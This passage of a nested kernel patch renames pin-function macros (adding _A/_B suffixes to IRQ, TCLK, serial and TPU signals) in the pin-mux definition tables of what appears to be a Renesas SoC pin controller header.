+-#define GPSR2_8		F_(TPU0TO0,		IP1SR2_3_0)
+-#define GPSR2_7		F_(TPU0TO1,		IP0SR2_31_28)
++#define GPSR2_8		F_(TPU0TO0_A,		IP1SR2_3_0)
++#define GPSR2_7		F_(TPU0TO1_A,		IP0SR2_31_28)
+ #define GPSR2_6		F_(FXR_TXDB,		IP0SR2_27_24)
+-#define GPSR2_5		F_(FXR_TXENB_N,		IP0SR2_23_20)
++#define GPSR2_5		F_(FXR_TXENB_N_A,	IP0SR2_23_20)
+ #define GPSR2_4		F_(RXDB_EXTFXR,		IP0SR2_19_16)
+ #define GPSR2_3		F_(CLK_EXTFXR,		IP0SR2_15_12)
+ #define GPSR2_2		F_(RXDA_EXTFXR,		IP0SR2_11_8)
+-#define GPSR2_1		F_(FXR_TXENA_N,		IP0SR2_7_4)
++#define GPSR2_1		F_(FXR_TXENA_N_A,	IP0SR2_7_4)
+ #define GPSR2_0		F_(FXR_TXDA,		IP0SR2_3_0)
+ 
+ /* GPSR3 */
+@@ -269,13 +269,13 @@
+ 
+ /* SR0 */
+ /* IP0SR0 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP0SR0_3_0	F_(0, 0)		FM(ERROROUTC_N_B)	FM(TCLK2_A)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR0_3_0	F_(0, 0)		FM(ERROROUTC_N_B)	FM(TCLK2_B)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ #define IP0SR0_7_4	F_(0, 0)		FM(MSIOF3_SS1)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ #define IP0SR0_11_8	F_(0, 0)		FM(MSIOF3_SS2)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR0_15_12	FM(IRQ3)		FM(MSIOF3_SCK)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR0_19_16	FM(IRQ2)		FM(MSIOF3_TXD)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR0_23_20	FM(IRQ1)		FM(MSIOF3_RXD)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR0_27_24	FM(IRQ0)		FM(MSIOF3_SYNC)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR0_15_12	FM(IRQ3_A)		FM(MSIOF3_SCK)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR0_19_16	FM(IRQ2_A)		FM(MSIOF3_TXD)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR0_23_20	FM(IRQ1_A)		FM(MSIOF3_RXD)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR0_27_24	FM(IRQ0_A)		FM(MSIOF3_SYNC)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ #define IP0SR0_31_28	FM(MSIOF5_SS2)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ 
+ /* IP1SR0 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+@@ -284,72 +284,72 @@
+ #define IP1SR0_11_8	FM(MSIOF5_TXD)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ #define IP1SR0_15_12	FM(MSIOF5_SCK)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ #define IP1SR0_19_16	FM(MSIOF5_RXD)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR0_23_20	FM(MSIOF2_SS2)		FM(TCLK1)		FM(IRQ2_A)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR0_27_24	FM(MSIOF2_SS1)		FM(HTX1)		FM(TX1)			F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR0_31_28	FM(MSIOF2_SYNC)		FM(HRX1)		FM(RX1)			F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR0_23_20	FM(MSIOF2_SS2)		FM(TCLK1_A)		FM(IRQ2_B)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR0_27_24	FM(MSIOF2_SS1)		FM(HTX1_A)		FM(TX1_A)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR0_31_28	FM(MSIOF2_SYNC)		FM(HRX1_A)		FM(RX1_A)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ 
+ /* IP2SR0 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP2SR0_3_0	FM(MSIOF2_TXD)		FM(HCTS1_N)		FM(CTS1_N)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR0_7_4	FM(MSIOF2_SCK)		FM(HRTS1_N)		FM(RTS1_N)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR0_11_8	FM(MSIOF2_RXD)		FM(HSCK1)		FM(SCK1)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR0_3_0	FM(MSIOF2_TXD)		FM(HCTS1_N_A)		FM(CTS1_N_A)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR0_7_4	FM(MSIOF2_SCK)		FM(HRTS1_N_A)		FM(RTS1_N_A)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR0_11_8	FM(MSIOF2_RXD)		FM(HSCK1_A)		FM(SCK1_A)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ 
+ /* SR1 */
+ /* IP0SR1 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP0SR1_3_0	FM(MSIOF1_SS2)		FM(HTX3_A)		FM(TX3)			F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR1_7_4	FM(MSIOF1_SS1)		FM(HCTS3_N_A)		FM(RX3)			F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR1_11_8	FM(MSIOF1_SYNC)		FM(HRTS3_N_A)		FM(RTS3_N)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR1_15_12	FM(MSIOF1_SCK)		FM(HSCK3_A)		FM(CTS3_N)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR1_19_16	FM(MSIOF1_TXD)		FM(HRX3_A)		FM(SCK3)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR1_3_0	FM(MSIOF1_SS2)		FM(HTX3_B)		FM(TX3_B)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR1_7_4	FM(MSIOF1_SS1)		FM(HCTS3_N_B)		FM(RX3_B)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR1_11_8	FM(MSIOF1_SYNC)		FM(HRTS3_N_B)		FM(RTS3_N_B)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR1_15_12	FM(MSIOF1_SCK)		FM(HSCK3_B)		FM(CTS3_N_B)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR1_19_16	FM(MSIOF1_TXD)		FM(HRX3_B)		FM(SCK3_B)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ #define IP0SR1_23_20	FM(MSIOF1_RXD)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR1_27_24	FM(MSIOF0_SS2)		FM(HTX1_X)		FM(TX1_X)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR1_31_28	FM(MSIOF0_SS1)		FM(HRX1_X)		FM(RX1_X)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR1_27_24	FM(MSIOF0_SS2)		FM(HTX1_B)		FM(TX1_B)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR1_31_28	FM(MSIOF0_SS1)		FM(HRX1_B)		FM(RX1_B)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ 
+ /* IP1SR1 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP1SR1_3_0	FM(MSIOF0_SYNC)		FM(HCTS1_N_X)		FM(CTS1_N_X)		FM(CANFD5_TX_B)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR1_7_4	FM(MSIOF0_TXD)		FM(HRTS1_N_X)		FM(RTS1_N_X)		FM(CANFD5_RX_B)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR1_11_8	FM(MSIOF0_SCK)		FM(HSCK1_X)		FM(SCK1_X)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR1_3_0	FM(MSIOF0_SYNC)		FM(HCTS1_N_B)		FM(CTS1_N_B)		FM(CANFD5_TX_B)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR1_7_4	FM(MSIOF0_TXD)		FM(HRTS1_N_B)		FM(RTS1_N_B)		FM(CANFD5_RX_B)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR1_11_8	FM(MSIOF0_SCK)		FM(HSCK1_B)		FM(SCK1_B)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ #define IP1SR1_15_12	FM(MSIOF0_RXD)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ #define IP1SR1_19_16	FM(HTX0)		FM(TX0)			F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR1_23_20	FM(HCTS0_N)		FM(CTS0_N)		FM(PWM8_A)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR1_27_24	FM(HRTS0_N)		FM(RTS0_N)		FM(PWM9_A)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR1_31_28	FM(HSCK0)		FM(SCK0)		FM(PWM0_A)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR1_23_20	FM(HCTS0_N)		FM(CTS0_N)		FM(PWM8)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR1_27_24	FM(HRTS0_N)		FM(RTS0_N)		FM(PWM9)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR1_31_28	FM(HSCK0)		FM(SCK0)		FM(PWM0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ 
+ /* IP2SR1 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+ #define IP2SR1_3_0	FM(HRX0)		FM(RX0)			F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ #define IP2SR1_7_4	FM(SCIF_CLK)		FM(IRQ4_A)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR1_11_8	FM(SSI_SCK)		FM(TCLK3)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR1_15_12	FM(SSI_WS)		FM(TCLK4)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR1_19_16	FM(SSI_SD)		FM(IRQ0_A)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR1_23_20	FM(AUDIO_CLKOUT)	FM(IRQ1_A)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR1_11_8	FM(SSI_SCK)		FM(TCLK3_B)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR1_15_12	FM(SSI_WS)		FM(TCLK4_B)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR1_19_16	FM(SSI_SD)		FM(IRQ0_B)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR1_23_20	FM(AUDIO_CLKOUT)	FM(IRQ1_B)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ #define IP2SR1_27_24	FM(AUDIO_CLKIN)		FM(PWM3_A)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR1_31_28	F_(0, 0)		FM(TCLK2)		FM(MSIOF4_SS1)		FM(IRQ3_B)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR1_31_28	F_(0, 0)		FM(TCLK2_A)		FM(MSIOF4_SS1)		FM(IRQ3_B)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ 
+ /* IP3SR1 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP3SR1_3_0	FM(HRX3)		FM(SCK3_A)		FM(MSIOF4_SS2)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP3SR1_7_4	FM(HSCK3)		FM(CTS3_N_A)		FM(MSIOF4_SCK)		FM(TPU0TO0_A)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP3SR1_11_8	FM(HRTS3_N)		FM(RTS3_N_A)		FM(MSIOF4_TXD)		FM(TPU0TO1_A)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP3SR1_15_12	FM(HCTS3_N)		FM(RX3_A)		FM(MSIOF4_RXD)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP3SR1_19_16	FM(HTX3)		FM(TX3_A)		FM(MSIOF4_SYNC)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP3SR1_3_0	FM(HRX3_A)		FM(SCK3_A)		FM(MSIOF4_SS2)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP3SR1_7_4	FM(HSCK3_A)		FM(CTS3_N_A)		FM(MSIOF4_SCK)		FM(TPU0TO0_B)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP3SR1_11_8	FM(HRTS3_N_A)		FM(RTS3_N_A)		FM(MSIOF4_TXD)		FM(TPU0TO1_B)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP3SR1_15_12	FM(HCTS3_N_A)		FM(RX3_A)		FM(MSIOF4_RXD)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP3SR1_19_16	FM(HTX3_A)		FM(TX3_A)		FM(MSIOF4_SYNC)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ 
+ /* SR2 */
+ /* IP0SR2 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP0SR2_3_0	FM(FXR_TXDA)		FM(CANFD1_TX)		FM(TPU0TO2_A)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR2_7_4	FM(FXR_TXENA_N)		FM(CANFD1_RX)		FM(TPU0TO3_A)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR2_11_8	FM(RXDA_EXTFXR)		FM(CANFD5_TX)		FM(IRQ5)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR2_15_12	FM(CLK_EXTFXR)		FM(CANFD5_RX)		FM(IRQ4_B)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR2_3_0	FM(FXR_TXDA)		FM(CANFD1_TX)		FM(TPU0TO2_B)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR2_7_4	FM(FXR_TXENA_N_A)	FM(CANFD1_RX)		FM(TPU0TO3_B)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR2_11_8	FM(RXDA_EXTFXR)		FM(CANFD5_TX_A)		FM(IRQ5)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
